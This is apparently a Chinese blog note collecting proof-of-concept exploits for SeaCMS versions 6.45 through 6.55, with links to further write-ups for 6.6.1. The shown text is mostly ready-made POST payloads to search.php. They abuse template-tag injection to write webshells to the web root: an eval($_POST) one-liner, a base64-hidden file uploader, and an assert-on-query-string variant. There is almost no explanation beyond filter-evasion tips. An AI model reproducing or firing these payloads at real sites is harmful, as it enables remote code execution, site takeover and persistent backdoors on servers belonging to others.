seacms

seacms6.45漏洞getshell

https://blog.csdn.net/qq_35078631/article/details/76595817
poc:

192.168.0.6/seacms/search.php

post:
searchtype=5&order=}{end if} {if:1)fputs(fopen(base64_decode(eWVzaTEucGhw),w),base64_decode(base64_decode(UEhOamNtbHdkQ0JzWVc1bmRXRm5aVDBpY0dod0lqNUFaWFpoYkNna1gxQlBVMVJiZVdWemFURmRLVHd2YzJOeWFYQjBQZz09)));if(1}{end if}

在网站根目录创建yesi1.php文件 内容

<script language="php">@eval($_POST[yesi1])</script>

海洋cms v6.53 v6.54版本漏洞复现

https://www.cnblogs.com/zhaijiahui/p/7648350.html
菜刀(代码执行)函数和命令执行函数详解及Getshell方法
https://www.cnblogs.com/fox-yu/p/9134848.html
poc:
写入上传马(利用post传参,不能出现【<】【>】【+】【=】【/】等符号)

192.168.0.6/seacms/search.php

post:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));

上传一句话

seacms 6.55 代码注入漏洞

https://github.com/SukaraLin/php_code_audit_project/blob/master/seacms/seacms%206.55%20%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

poc

http://192.168.0.6/upload/search.php?fputs(fopen(base64_decode(eWVzaTEucGhw),w),base64_decode(base64_decode(UEhOamNtbHdkQ0JzWVc1bmRXRm5aVDBpY0dod0lqNUFaWFpoYkNna1gxQlBVMVJiZVdWemFURmRLVHd2YzJOeWFYQjBQZz09)));

post:
searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*

seacms 6.6.1

seamcms 6.6.1后台getshell

https://github.com/SecWiki/CMS-Hunter/blob/master/seacms/seacms6.61/seacms.md

seamcms 6.6.1后台 xss存储

https://github.com/SecWiki/CMS-Hunter/blob/master/seacms/seacms6.61/seacms661.md

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器